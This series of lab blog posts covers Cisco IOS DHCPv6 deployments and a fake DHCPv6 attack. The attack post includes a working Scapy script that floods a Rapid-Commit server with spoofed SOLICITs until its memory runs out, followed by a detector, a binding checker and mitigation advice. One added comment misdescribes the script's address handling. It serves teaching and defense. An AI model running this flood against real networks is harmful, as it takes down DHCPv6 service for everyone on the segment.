Fake DHCPv6 attack


DHCPv6 runs over connectionless UDP: clients use port 546, servers and relay agents port 547. As RFC 3315 acknowledges in its security considerations, nothing authenticates a client, so the protocol is exposed to spoofing attacks in which SOLICIT messages are generated from random source MAC and link-local addresses, each carrying its own DUID.

With DHCPv6 Rapid-Commit, ONLY two messages are exchanged between the client and the server to obtain an IPv6 address: SOLICIT and REPLY. The server creates the binding as soon as it processes the SOLICIT, which is exactly what the attack exploits.

Picture1: lab topology – IOS 12.4(24)T implemented in GNS3

DHCPv6 server configuration:

ipv6 dhcp pool SLAAC-POOL
address prefix 2001:DB8:5AB::/64 lifetime infinite infinite
dns-server 2001:DB8:5AB::57
domain-name nouri.com
!
interface FastEthernet1/0
ip address 192.168.0.202 255.255.255.0
ipv6 address 2001:DB8::202/64
ipv6 enable
ipv6 dhcp server SLAAC-POOL rapid-commit
end

Layer2 Switch configuration:

interface FastEthernet1/0
switchport access vlan 10
!
interface FastEthernet1/1
switchport mode trunk

Below is the Scapy script used for the attack; it is rough but does the job.

You can enter the DHCPv6 server MAC address manually, taken from the local neighbor table, or have a script learn it by pinging the All_DHCP_Relay_Agents_and_Servers multicast address FF02::1:2.

SOLICIT messages are sent blindly, without waiting for any response.

 

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# DHCPv6 fake attack
# Date:     28/10/11
# Author:   AJ NOURI (cciethebeginning.wordpress.com)
#
# Floods a DHCPv6 server with SOLICIT messages, each sent from a freshly
# generated MAC address, link-local address and DUID-LL, so that every
# message creates a new binding on the server. Run as root on the lab segment.

import random

from scapy.all import (Ether, IPv6, UDP, DHCP6_Solicit, DHCP6OptClientId,
                       DHCP6OptIA_NA, DHCP6OptRapidCommit, DHCP6OptElapsedTime,
                       DHCP6OptOptReq, DUID_LL, sendp)

# Interface to send from and the DHCPv6 server MAC address. The server MAC
# can be read from the local neighbor table (or learned by pinging FF02::1:2);
# the value below is the lab server's address.
IFACE = "eth1"
MACDST = "ca:00:39:b8:00:06"


class RandMac(object):
    """Generates a random unicast MAC address and the corresponding
    EUI-64 based link-local IPv6 address."""

    def __init__(self):
        octets = [random.randint(0, 255) for _ in range(6)]
        octets[0] &= 0xFE          # clear the I/G bit: a source MAC must be unicast
        self.octets = octets

    def form1b(self):
        """Format 1: xx:xx:xx:xx:xx:xx"""
        return ":".join("%02x" % o for o in self.octets)

    def form2b(self):
        """Format 2: xxxx.xxxx.xxxx (Cisco style)"""
        h = "".join("%02x" % o for o in self.octets)
        return "%s.%s.%s" % (h[0:4], h[4:8], h[8:12])

    def eui64(self):
        """Interface ID in modified EUI-64 format: ff:fe inserted between the
        two halves of the MAC and the universal/local bit (0x02 of the first
        octet) flipped."""
        o = list(self.octets)
        o[0] ^= 0x02
        iid = o[0:3] + [0xFF, 0xFE] + o[3:6]
        return ":".join("%02x%02x" % (iid[i], iid[i + 1]) for i in range(0, 8, 2))

    def ip6_ll_eui64(self):
        """Link-local IPv6 address derived from the MAC (fe80::/64 + EUI-64)."""
        return "fe80::" + self.eui64()


def build_solicit(macsrc, ipv6llsrc):
    """Build one SOLICIT with IA_NA, Rapid Commit, Elapsed Time, Client ID
    (DUID-LL: type 3, hardware type 1, MAC) and an Option Request for DNS
    servers and domain list. Scapy computes the option lengths itself."""
    l2 = Ether(src=macsrc, dst=MACDST)
    l3 = IPv6(src=ipv6llsrc, dst="ff02::1:2")      # All_DHCP_Relay_Agents_and_Servers
    l4 = UDP(sport=546, dport=547)
    sol = DHCP6_Solicit(trid=random.randint(0, 0xFFFFFF))   # 24-bit transaction id
    iana = DHCP6OptIA_NA(T1=0, T2=0)
    rc = DHCP6OptRapidCommit()
    et = DHCP6OptElapsedTime()
    cid = DHCP6OptClientId(duid=DUID_LL(lladdr=macsrc))
    opreq = DHCP6OptOptReq()                         # defaults to DNS servers + domain list
    return l2 / l3 / l4 / sol / iana / rc / et / cid / opreq


def main():
    # SOLICITs are sent blindly; no reply is expected or read.
    sent = 0
    try:
        while True:
            macs = RandMac()
            pkt = build_solicit(macs.form1b(), macs.ip6_ll_eui64())
            sendp(pkt, iface=IFACE, verbose=False)
            sent += 1
    except KeyboardInterrupt:
        print("Program interrupted by user after %d SOLICIT messages" % sent)


if __name__ == "__main__":
    main()

Picture2: Fake DHCPv6 SOLICIT packets in Wireshark

Victim router:

R2#sh ipv6 dhcp pool
DHCPv6 pool: SLAAC-POOL
Address allocation prefix: 2001:DB8:5AB::/64 valid 4294967295 preferred 4294967295 (91725 in use, 0 conflicts)
DNS server: 2001:DB8:5AB::57
Domain name: nouri.com
Active clients: 91725
R2#

Look at the number of fake active clients already!

A /64 holds 2^64 = 18,446,744,073,709,551,616 addresses, so the purpose is obviously not to deplete the pool; that would take a ridiculous amount of time. The attack is about exhausting the server's CPU and memory.

Resource consumption:

Baseline (before the attack):

During the attack:

All of the interrupt-level processing is caused by DHCPv6 and ND activity.

R2#sh proc cpu
CPU utilization for five seconds: 92%/100%; one minute: 87%; five minutes: 83%
PID Runtime(ms) Invoked uSecs 5Sec 1Min 5Min TTY Process

The CPU impact may be less severe on hardware platforms, but each binding table entry still costs the same amount of memory.

Thirty minutes later, the 128 MB of memory on our DHCPv6 router are depleted and the router starts firing syslog messages to signal the problem.

Imagine what you could do with a more sophisticated piece of software or with hardware traffic generators like Ixia or Spirent.

Pool: Processor Free: 58968 Cause: Memory fragmentation
Alternate Pool: None Free: 0 Cause: No Alternate pool
-Process= “DHCPv6 Server“, ipl= 0, pid= 266, -Traceback= 0x6000A944z 0x600238C8z 0x63D60D6Cz 0x6220DB68z 0x622152E8z 0x62210170z 0x62210498z 0x62211128z 0x622112C8z 0x63079090z 0x63079074z
*Jan 21 19:46:24.669: %SYS-2-MALLOCFAIL: Memory allocation of 320 bytes failed from 0x6220DB60, alignment 0

Here are more self-explanatory figures about the event:

Picture3: CPU utilization


Picture4: memory utilization


Although the DHCPv6 SOLICIT messages consume insignificant bandwidth, the harm comes from the memory the server allocates for each packet: every fresh DUID gets its own binding.


The denial of service targets the binding table associated with the DHCPv6 configuration pool.

The DHCPv6 server maintains an automatic binding table in memory to track the configuration parameters, such as addresses or prefixes, that it has assigned to its clients.
The binding table holds a record for every address or prefix in the configuration pool that has been explicitly handed out to a client. Each entry contains the following information:

  • Client DUID
  • Client IPv6 address
  • A list of IAPDs associated with the client
  • A list of prefixes delegated to each IAPD
  • Preferred and valid lifetimes for each prefix
  • The configuration pool to which this binding table belongs

To clear the DHCPv6 router binding table:

R2#clear ipv6 dhcp bind *
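Every entry in that table is keyed by the client DUID, so each SOLICIT carrying a fresh DUID-LL costs the server a new binding; that is the signal to watch for. The following is an added example, not code from the original post: it encodes and decodes the SOLICIT the way the attack script puts it on the wire (RFC 3315 header and options, plain Python without Scapy), and runs a simple detector over a constructed stream of timestamps and payloads that flags a window in which more distinct client DUIDs appear than a real segment would ever produce. The window size, the threshold and the sample MAC addresses are assumptions; two of the MACs are taken from the lab DUIDs shown in these posts, the third is made up.

```python
import random
import struct
from collections import defaultdict

MSG_SOLICIT = 1
OPT_CLIENTID, OPT_IA_NA, OPT_ORO, OPT_ELAPSED_TIME, OPT_RAPID_COMMIT = 1, 3, 6, 8, 14


def duid_ll(mac):
    """DUID-LL (RFC 3315 s.9.4): DUID type 3, hardware type 1 (Ethernet), MAC."""
    return struct.pack("!HH", 3, 1) + bytes.fromhex(mac.replace(":", ""))


def option(code, data):
    """One DHCPv6 option: 2-byte code, 2-byte length, data."""
    return struct.pack("!HH", code, len(data)) + data


def build_solicit(trid, mac, iaid=0x00040001):
    """SOLICIT with the options the attack script sends: IA_NA, Rapid Commit,
    Elapsed Time, Client Identifier (DUID-LL) and an Option Request for DNS
    servers (23) and domain list (24). Header is msg-type + 24-bit trid."""
    msg = struct.pack("!I", (MSG_SOLICIT << 24) | (trid & 0xFFFFFF))
    msg += option(OPT_IA_NA, struct.pack("!III", iaid, 0, 0))     # IAID, T1, T2
    msg += option(OPT_RAPID_COMMIT, b"")
    msg += option(OPT_ELAPSED_TIME, struct.pack("!H", 0))
    msg += option(OPT_CLIENTID, duid_ll(mac))
    msg += option(OPT_ORO, struct.pack("!HH", 23, 24))
    return msg


def parse(msg):
    """Decode a DHCPv6 message into (msg_type, trid, {code: [data, ...]}).
    Refuses truncated input instead of reading past the end: an option whose
    announced length overruns the datagram is the classic malformed case."""
    if len(msg) < 4:
        raise ValueError("short DHCPv6 header")
    (hdr,) = struct.unpack("!I", msg[:4])
    msg_type, trid = hdr >> 24, hdr & 0xFFFFFF
    opts, off = defaultdict(list), 4
    while off < len(msg):
        if off + 4 > len(msg):
            raise ValueError("truncated option header at offset %d" % off)
        code, length = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        if off + length > len(msg):
            raise ValueError("option %d overruns the message" % code)
        opts[code].append(msg[off:off + length])
        off += length
    return msg_type, trid, dict(opts)


class SolicitFloodDetector:
    """Counts distinct client DUIDs seen in SOLICITs per fixed time window.
    A real segment shows a handful of DUIDs per window; the fake attack shows
    one new DUID per packet, because each SOLICIT carries a fresh DUID-LL and
    each one costs the server a new binding."""

    def __init__(self, window_s=10, max_new_duids=50):
        self.window_s = window_s
        self.max_new_duids = max_new_duids
        self.windows = defaultdict(set)    # window start -> DUIDs seen in it

    def observe(self, ts, msg):
        """Feed one DHCPv6 payload (UDP/547) together with its capture timestamp."""
        msg_type, _, opts = parse(msg)
        if msg_type != MSG_SOLICIT or OPT_CLIENTID not in opts:
            return
        window = int(ts // self.window_s) * self.window_s
        self.windows[window].add(opts[OPT_CLIENTID][0])

    def alerts(self):
        """(window start, distinct DUIDs) for every window above the threshold."""
        return [(w, len(d)) for w, d in sorted(self.windows.items())
                if len(d) > self.max_new_duids]


def demo():
    """Constructed traffic: three real clients SOLICIT once in the first window
    (two MACs taken from the lab DUIDs, one made up), then a flood of 200
    SOLICITs with random unicast MACs, as the attack script produces, in the next."""
    det = SolicitFloodDetector(window_s=10, max_new_duids=50)
    for i, mac in enumerate(["ca:06:0c:88:00:08", "ca:02:1f:f8:00:08", "00:0c:29:3a:41:5b"]):
        det.observe(1.0 + i, build_solicit(0x100 + i, mac))
    rng = random.Random(1)                 # seeded so the demo is reproducible
    for i in range(200):
        octets = [rng.randrange(256) for _ in range(6)]
        octets[0] &= 0xFE                  # unicast, like the attack script
        mac = ":".join("%02x" % o for o in octets)
        det.observe(12.0 + i * 0.01, build_solicit(rng.randrange(1 << 24), mac))
    return det.alerts()


if __name__ == "__main__":
    print(demo())
```

Feed observe() the UDP/547 payloads from a capture, with their timestamps, and a window with hundreds of new DUIDs is the fake attack, while a handful is normal boots and renewals. The parser refuses an option that overruns the datagram rather than slicing past its end, which matters when the input is attacker-controlled.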

Threat mitigation:

Here are a couple of mitigation tools to consider against this attack:

802.1X for Layer 2 authentication, before the host can even start the DHCPv6 exchange.

Secure Neighbor Discovery (SEND, RFC 3971) is a more complex architecture requiring cryptography, SEND-capable hosts and a PKI; at least an entire post will be dedicated to it. Note that SEND protects Neighbor Discovery, not the DHCPv6 messages themselves.

ND-related first-hop security features can be enabled on the Layer 2 switch connecting the DHCPv6 clients:

  • IPv6 device tracking, to make sure the neighbor table contains only live hosts.
  • ND inspection: reject ND messages whose MAC address cannot be verified.
  • Depending on the expected number of IPv6 users, an ND cache limit, globally or per interface.

References:

http://www.ietf.org/rfc/rfc3315.txt

http://www.ietf.org/id/draft-ietf-dhc-secure-dhcpv6-04.txt

http://www.cisco.com/en/US/docs/ios/ipv6/configuration/guide/ip6-first_hop_security_ps6441_TSD_Products_Configuration_Guide_Chapter.html#wp1155200


Stateful DHCPv6 Prefix delegation (Rapid-commit) [4/4]


Picture1: DHCPv6 prefix delegation topology


R1 configuration [> 12.4(24) T]:

Prefix delegation makes it possible to centrally control the IPv6 prefixes used in remote sites.

Router R1 acts as the delegating DHCPv6 server for the requesting router R2, which in turn provides addressing to the end clients.

For example, R1 can be a service provider MPLS PE (Provider Edge) router, R2 a customer CPE (Customer Premises Equipment) router, and the end clients are the hosts behind it (router R3 in our case).

R1 decides which prefix to delegate to a remote router by matching the configured client DUID (00030001CA02188C0008 in the configuration below) against the Client Identifier carried in the SOLICIT message received from the client.

R1:

ipv6 dhcp pool PDCONF
prefix-delegation 2001:DB8:23::/48 00030001CA02188C0008
dns-server 2001:DB8::57
domain-name nouri.com

The DHCPv6 server functionality is enabled on the interface fa0/0 facing R2, the intermediate server that will receive the delegated prefix 2001:DB8:23::/48.

interface FastEthernet0/0
ipv6 address 2001:DB8:12::1/64
ipv6 nd other-config-flag
ipv6 dhcp server PDCONF rapid-commit

R2 configuration [> 12.4(24) T]:

Router R2 interface fa0/0, facing the DHCPv6 server R1, acts as a DHCPv6 prefix-delegation client:

interface FastEthernet0/0
ipv6 address 2001:DB8:12::2/64
ipv6 enable
ipv6 dhcp client pd PDCONF rapid-commit

Router R2 interface fa0/1, facing the client R3, acts as the gateway: it takes an address from the delegated prefix for itself (interface ID ::2 here, through the general prefix PDCONF) and advertises that prefix in its Router Advertisements.

interface FastEthernet0/1
ipv6 address PDCONF ::2/64
ipv6 enable

And the end client builds its address from the prefix in the Router Advertisement (SLAAC).

R3:

interface FastEthernet0/0
ipv6 address autoconfig
ipv6 enable

R3(config-if)#do sh ipv6 interface brief

FastEthernet0/0 [up/up]

FE80::C800:1AFF:FECC:8


2001:DB8:23:0:C800:1AFF:FECC:8


R3(config-if)#

Verification:

R1 (Server):

R1#sh ipv6 dhcp pool

DHCPv6 pool: PDCONF

Static bindings:

Binding for client 00030001CA021FF80008

IA PD: IA ID not specified; being used by 00040001


Prefix: 2001:DB8:23::/48

preferred lifetime 604800, valid lifetime 2592000


DNS server: 2001:DB8::57


Domain name: nouri.com


Active clients: 1

R1#

The PDCONF prefix is delegated to the client with DUID 00030001CA021FF80008.

R1#sh ipv6 dhcp interface

FastEthernet0/0 is in server mode

Using pool: PDCONF

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R1#

R2 (intermediate client/server) before delegation:

R2#sh ipv6 dhcp interface

FastEthernet0/0 is in client mode

Prefix State is SOLICIT (7)

Retransmission timer expires in 00:00:42

Address State is IDLE

Prefix Rapid-Commit: enabled

Address Rapid-Commit: disabled

FastEthernet0/1 is in server mode

Using pool: PDCONF

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

R2 (intermediate client/server) after delegation:

R2#sh ipv6 dhcp int

FastEthernet0/0 is in client mode


Prefix State is OPEN

Renew will be sent in 3d11h

Address State is IDLE

List of known servers:

Reachable via address: FE80::C803:CFF:FEBC:8


DUID: 00030001CA030CBC0008

Preference: 0

Configuration parameters:

IA PD: IA ID 0x00040001, T1 302400, T2 483840


Prefix: 2001:DB8:23::/48

preferred lifetime 604800, valid lifetime 2592000

expires at Dec 10 2011 02:58 AM (2591829 seconds)


DNS server: 2001:DB8::57


Domain name: nouri.com

Information refresh time: 0


Prefix name: PDCONF

Prefix Rapid-Commit: enabled

Address Rapid-Commit: disabled

FastEthernet0/1 is in server mode

Using pool: PDCONF

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

Picture2: DHCPv6 SOLICIT sent by R2 to R1

R1 (debug ipv6 dhcp) responding to the SOLICIT from R2:

R1(config-dhcpv6)#

*Nov 10 02:58:18.579: IPv6 DHCP: Received SOLICIT from FE80::C802:1FFF:FEF8:8 on FastEthernet0/0

*Nov 10 02:58:18.583: IPv6 DHCP: Using interface pool PDCONF

*Nov 10 02:58:18.583: IPv6 DHCP: Creating binding for FE80::C802:1FFF:FEF8:8 in pool PDCONF

*Nov 10 02:58:18.583: IPv6 DHCP: Allocating IA_PD 00040001 in binding for FE80::C802:1FFF:FEF8:8

*Nov 10 02:58:18.587: IPv6 DHCP: Allocating prefix 2001:DB8:23::/48 in binding for FE80::C802:1FFF:FEF8:8, IAID 00040001

*Nov 10 02:58:18.591: IPv6 DHCP: Sending REPLY to FE80::C802:1FFF:FEF8:8 on FastEthernet0/0

R1(config-dhcpv6)#

Picture3: DHCP REPLY sent by R1 (the delegating server) to R2

About the DUID (DHCP Unique Identifier)

A DUID identifies one DHCPv6 participant, client or server; it is not tied to a (client, server) pair. Cisco IOS builds it as a DUID-LL from the MAC address of its lowest-numbered interface, which is why the DUIDs below match the EUI-64 link-local addresses shown by "show ipv6 interface brief". It should remain the same across reboots.

RFC 3315:

"DHCP clients use DUIDs to identify a server in messages where a server needs to be identified."
"The DUID is designed to be unique across all DHCP clients and servers, and stable for any specific client or server - that is, the DUID used by a client or server SHOULD NOT change over time if at all possible; for example, a device's DUID should not change as a result of a change in the device's network hardware."
"The motivation for having more than one type of DUID is that the DUID must be globally unique, and must also be easy to generate."
...
DUID Based on Link-layer Address [DUID-LL]:
DUID type 3 (2 octets) + hardware type (2 octets, 1 = Ethernet) + link-layer address (6 octets for Ethernet), 10 octets in total.

R1: DUID in the DHCPv6 server role

R1#sh ipv6 dhcp

This device’s DHCPv6 unique identifier(DUID): 00030001CA030CBC0008

R1# sh ipv6 interface brief

FastEthernet0/0 [up/up]

FE80::C803:CFF:FEBC:8

2001:DB8:12::1


R1#

R2: DUID in the DHCPv6 client/server role

R2#sh ipv6 dhcp

This device’s DHCPv6 unique identifier(DUID): 00030001CA021FF80008

R2#

R2#sh ipv6 interface brief

FastEthernet0/0 [up/up]

FE80::C802:1FFF:FEF8:8

2001:DB8:12::2


R2#
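Because IOS derives both the DUID-LL and the EUI-64 link-local address from the same MAC, the two outputs above can be cross-checked mechanically: the last six bytes of the DUID are the MAC, and the link-local address is that MAC with its universal/local bit flipped and ff:fe inserted in the middle. The following is an added example, not part of the original post; the DUIDs and addresses it uses are the ones printed above, and the mismatch cases are constructed. A client whose link-local address does not derive from its DUID-LL MAC is not necessarily hostile (DUID-LLT and DUID-EN clients, and hosts using RFC 4941 privacy addresses, all fail this test), but for IOS routers, and for the un-flipped addresses the original attack script produced, the check is a quick way to triage a binding table.

```python
import ipaddress


def duid_ll_to_mac(duid_hex):
    """Decode a DUID-LL as printed by 'show ipv6 dhcp': 2-byte DUID type (3),
    2-byte hardware type (1 = Ethernet), 6-byte link-layer address."""
    raw = bytes.fromhex(duid_hex)
    if len(raw) != 10 or raw[0:2] != b"\x00\x03":
        raise ValueError("not a 10-byte DUID-LL: %s" % duid_hex)
    if raw[2:4] != b"\x00\x01":
        raise ValueError("unexpected hardware type 0x%s" % raw[2:4].hex())
    return ":".join("%02x" % b for b in raw[4:])


def mac_to_link_local(mac):
    """fe80::/64 with a modified EUI-64 interface ID: flip the U/L bit
    (0x02 of the first octet) and insert ff:fe between the two MAC halves."""
    octets = bytearray.fromhex(mac.replace(":", "").replace("-", "").replace(".", ""))
    if len(octets) != 6:
        raise ValueError("not a 48-bit MAC address: %s" % mac)
    octets[0] ^= 0x02
    iid = bytes(octets[:3]) + b"\xff\xfe" + bytes(octets[3:])
    return ipaddress.IPv6Address(b"\xfe\x80" + b"\x00" * 6 + iid)


def link_local_matches_duid(duid_hex, link_local):
    """True when the neighbor's link-local address is the EUI-64 form of the
    MAC inside its DUID-LL, as IOS builds both from the same lowest-numbered
    interface. False for addresses built without the U/L flip (the original
    attack script), for DUID-LLT/DUID-EN clients and for random (RFC 4941) IIDs."""
    try:
        expected = mac_to_link_local(duid_ll_to_mac(duid_hex))
    except ValueError:
        return False
    return expected == ipaddress.IPv6Address(link_local)


def check_bindings(bindings):
    """bindings: list of (client link-local, DUID hex) as in 'show ipv6 dhcp binding'.
    Returns the entries whose address does not derive from their DUID."""
    return [(ll, duid) for ll, duid in bindings if not link_local_matches_duid(duid, ll)]


if __name__ == "__main__":
    # First two pairs are taken from the lab outputs above; the third is the
    # un-flipped form the original attack script would have sent (constructed).
    sample = [("FE80::C803:CFF:FEBC:8", "00030001CA030CBC0008"),
              ("FE80::C802:1FFF:FEF8:8", "00030001CA021FF80008"),
              ("fe80::ca02:1fff:fef8:8", "00030001CA021FF80008")]
    print(check_bindings(sample))
```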

Stateful DHCPv6 Relay (Rapid-commit) [3/4]


Picture1: DHCPv6 relay topology


Server configuration [> 12.4(24) T]:

This configuration is useful when your DHCPv6 server is not on the same segment as the DHCPv6 clients.

R1 is the DHCPv6 server, R2 the DHCPv6 relay agent and R3 the DHCPv6 client.

R1:

ipv6 dhcp pool pool0
address prefix 2001:DB8::/64 lifetime infinite infinite
dns-server XXXX:YYYY:8B6B:90E0::57
dns-server 2001:DB8::57
domain-name nouri.com
!
interface FastEthernet0/0
no ip address
duplex full
speed 100
ipv6 address 2001:DB8:12::1/64
ipv6 nd other-config-flag
ipv6 dhcp server pool0 rapid-commit
end

R1#sh ipv6 dhcp pool

DHCPv6 pool: pool0

Address allocation prefix: 2001:DB8::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Active clients: 1

R1#

R1#sh ipv6 dhcp binding

Client: FE80::C800:62FF:FEB4:8

DUID: 00030001CA0062B40008

Username : unassigned

IA NA: IA ID 0x00040001, T1 43200, T2 69120

Address: 2001:DB8::90F4:41AD:A12A:EDD6

preferred lifetime INFINITY, , valid lifetime INFINITY,

R1#

R1#sh ipv6 dhcp interface fa0/0

FastEthernet0/0 is in server mode

Using pool: pool0

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R1#

DHCP Relay agent R2:

R2#sh ipv6 dhcp interface f0/1

FastEthernet0/1 is in relay mode

Relay destinations:


2001:DB8:12::1 via FastEthernet0/0

R2#

DHCPv6 Client R3:

R3#sh ipv6 dhcp interface fa0/0

FastEthernet0/0 is in client mode

Prefix State is IDLE

Address State is OPEN

Renew for address will be sent in 11:38:42

List of known servers:

Reachable via address: FE80::C802:51FF:FE48:6

DUID: 00030001CA0330500008

Preference: 0

Configuration parameters:

IA NA: IA ID 0x00040001, T1 43200, T2 69120

Address: 2001:DB8::90F4:41AD:A12A:EDD6/128

preferred lifetime INFINITY, valid lifetime INFINITY

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Information refresh time: 0

Prefix Rapid-Commit: disabled

Address Rapid-Commit: enabled

R3#

Picture2: Request from R2 (DHCPv6 Relay) to R1 (DHCPv6 server):

Picture3: Reply from R1 (DHCPv6 server) to R2 (DHCPv6 Relay):

Stateless DHCPv6 + SLAAC [2/4]


This is a common LAN deployment model in which DHCPv6 only distributes DNS server and domain name information, while IPv6 addresses are built by the hosts with classic SLAAC (Stateless Address Autoconfiguration) from the prefix advertised by the router.

(Server configuration [> 12.4(24) T])

ipv6 dhcp pool SLAAC-POOL

dns-server XXXX:YYYY:8B6B:90E0::57

dns-server 2001:DB8::57

domain-name nouri.com

!

interface FastEthernet0/1

ipv6 address 2001:DB8:23::2/64

ipv6 nd other-config-flag

ipv6 dhcp server SLAAC-POOL rapid-commit

end 

The client gets the prefix from the Neighbor Discovery protocol, through the RS (Router Solicitation)/RA (Router Advertisement) exchange.

The router sets the O (Other configuration) flag in its RAs, with "ipv6 nd other-config-flag", to tell the clients that other configuration information such as DNS servers and domain name is available through DHCPv6. The client then sends an INFORMATION-REQUEST instead of a SOLICIT, as the debug output below shows.

Picture1: Stateless message exchange

Picture2: RA special flag

Client configuration [> 12.4(24) T]:

interface FastEthernet0/0

ipv6 address autoconfig

ipv6 enable

end 

 

Verification:

R3(config-if)#

*Oct 24 00:51:45.989: IPv6 DHCP: Sending INFORMATION-REQUEST to FF02::1:2 on FastEthernet0/0

*Oct 24 00:51:45.989: IPv6 DHCP: DHCPv6 changes state from IDLE to INFORMATION-REQUEST (STATELESS) on FastEthernet0/0

*Oct 24 00:51:46.001: IPv6 DHCP: Received REPLY from FE80::C803:37FF:FEAC:6 on FastEthernet0/0

*Oct 24 00:51:46.001: IPv6 DHCP: Adding server FE80::C803:37FF:FEAC:6

*Oct 24 00:51:46.005: IPv6 DHCP: Processing options

*Oct 24 00:51:46.005: IPv6 DHCP: Configuring DNS server XXXX:YYYY:8B6B:90E0::57

*Oct 24 00:51:46.005: IPv6 DHCP: Configuring DNS server 2001:DB8::57

*Oct 24 00:51:46.005: IPv6 DHCP: Configuring domain name nouri.com

*Oct 24 00:51:46.009: IPv6 DHCP: DHCPv6 changes state from INFORMATION-REQUEST to IDLE (REPLY_RECEIVED) on FastEthernet0/0

R3(config-if)# 

 

R3#ii6

FastEthernet0/0 [up/up]

FE80::C806:CFF:FE88:8


2001:DB8:23:0:C806:CFF:FE88:8

FastEthernet0/1 [up/up]

FE80::C806:CFF:FE88:6

2001:DB8::203

R3# 

R2 (Server) :

R2#sh ipv6 dhcp binding

R2#sh ipv6 dhcp data

R2#sh ipv6 dhcp interface

FastEthernet0/1 is in server mode

Using pool: SLAAC-POOL

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

R2#sh ipv6 dhcp pool

DHCPv6 pool: SLAAC-POOL

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Active clients: 0

R2# 

Note that DHCPv6 provides only the DNS and domain name information and assigns no IPv6 address, hence the empty binding table and zero active clients.

Picture3: DHCP information request

Picture4: DHCP information reply

 

Picture5: ICMPv6 flow between DHCPv6 server and client interfaces:

IOS DHCPv6 deployment schemes


The following four posts are dedicated to DHCPv6 deployment. For the reasons I mentioned in the previous post, I used IOS version 12.4(24)T for all routers.

(XXXX:YYYY pattern in certain IPv6 addresses is used to hide a part of prefixes for privacy purpose)

Stateful DHCPv6 [1/4]

Rapid-commit

For this classic client-server DHCPv6 model, I deployed both modes: rapid-commit and normal (four-message) commit.

Picture1: Stateful DHCPv6 rapid-commit topology

Server configuration [> 12.4(24) T]:

ipv6 unicast-routing

ipv6 dhcp pool pool23

address prefix 2001:DB8:23::/64 lifetime infinite infinite

dns-server XXXX:YYYY:8B6B:90E0::57

dns-server 2001:DB8::57

domain-name nouri.com

 

interface FastEthernet0/1

ipv6 address 2001:DB8:23::2/64

ipv6 dhcp server pool23 rapid-commit

 

R2(config-if)#do sh ipv6 int brief

FastEthernet0/0 [administratively down/down]

unassigned

FastEthernet0/1 [up/up]

FE80::C803:37FF:FEAC:6
2001:DB8:23::2

FastEthernet1/0 [administratively down/down]

unassigned

FastEthernet1/1 [administratively down/down]

unassigned

R2(config-if)#

Client configuration [> 12.4(24) T]:

ipv6 unicast-routing

interface FastEthernet0/0
ipv6 address dhcp rapid-commit
ipv6 enable

Make sure to explicitly enable IPv6 on the interface, otherwise it will not send the SOLICIT message, as shown below:

R3(config-if)#

*Oct 23 00:41:58.363: IPv6 DHCP: IPv6 not ready on FastEthernet0/0, message not sent

With Rapid-Commit only two messages are exchanged between the client and the server:

The client asks for an address with a SOLICIT message carrying the Rapid Commit option, and the server answers directly with a REPLY containing the address.

In the default four-message mode the server first answers with an ADVERTISE and commits the address only when it receives the client's REQUEST, which carries the DUID of the server the client selected. With several DHCPv6 servers on the segment this lets the client pick one server and leaves the others uncommitted, whereas with Rapid-Commit every server that answers commits an address for the client.

R3(config-if)#
*Oct 23 00:43:13.179: IPv6 DHCP: Sending SOLICIT to FF02::1:2 on FastEthernet0/0
*Oct 23 00:43:13.287: IPv6 DHCP: Received REPLY from FE80::C803:37FF:FEAC:6 on FastEthernet0/0
*Oct 23 00:43:13.287: IPv6 DHCP: Adding server FE80::C803:37FF:FEAC:6
*Oct 23 00:43:13.291: IPv6 DHCP: Processing options
*Oct 23 00:43:13.291: IPv6 DHCP: Adding address 2001:DB8:23:0:70F8:B144:49B6:1FC8/128 to FastEthernet0/0
*Oct 23 00:43:13.299: IPv6 DHCP: T1 set to expire in 43200 seconds
*Oct 23 00:43:13.303: IPv6 DHCP: T2 set to expire in 69120 seconds

*Oct 23 00:43:13.303: IPv6 DHCP: Configuring DNS server XXXX:YYYY:8B6B:90E0::57

*Oct 23 00:43:13.303: IPv6 DHCP: Configuring DNS server 2001:DB8::57

*Oct 23 00:43:13.303: IPv6 DHCP: Configuring domain name nouri.com

*Oct 23 00:43:13.303: IPv6 DHCP: DHCPv6 address changes state from SOLICIT to OPEN (ADDR_REPLY_RECEIVED) on FastEthernet0/0

R3(config-if)#

Picture2: Rapid-Commit packet exchange

R3(config-if)#do show ipv6 int brief

FastEthernet0/0 [up/up]

FE80::C806:CFF:FE88:8
2001:DB8:23:0:70F8:B144:49B6:1FC8

FastEthernet0/1 [administratively down/down]

unassigned

R3(config-if)#

Verification:

DHCPv6 Server R2:

R2#sh ipv6 dhcp binding

Client: FE80::C806:CFF:FE88:8
DUID: 00030001CA060C880008

Username : unassigned

IA NA: IA ID 0x00040001, T1 43200, T2 69120

Address: 2001:DB8:23:0:8A1:BD85:5F98:2321

preferred lifetime INFINITY, , valid lifetime INFINITY,

R2#

DHCPv6 roles are configured per interface:

R2#sh ipv6 dhcp interface

FastEthernet0/1 is in server mode

Using pool: pool23

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

After the assignment, the server is aware of the client.

R2#sh ipv6 dhcp pool

DHCPv6 pool: pool23

Address allocation prefix: 2001:DB8:23::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Active clients: 1

R2#

DHCPv6 Client R3:

 

R3#sh ipv6 dhcp
This device’s DHCPv6 unique identifier(DUID): 00030001CA060C880008
R3#

 

R3#sh ipv6 dhcp interface

FastEthernet0/0 is in client mode
Prefix State is IDLE
Address State is OPEN
Renew for address will be sent in 10:18:52
List of known servers:

Reachable via address: FE80::C803:37FF:FEAC:6

DUID: 00030001CA0337AC0008

Preference: 0

Configuration parameters:

IA NA: IA ID 0x00040001, T1 43200, T2 69120

